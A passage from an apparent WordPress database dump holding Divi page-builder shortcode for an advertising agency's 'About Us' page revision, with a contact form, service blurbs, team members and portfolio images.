button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:34:36','2020-08-07 18:34:36','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(534,1,'2020-08-07 18:37:23','2020-08-07 18:37:23','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column 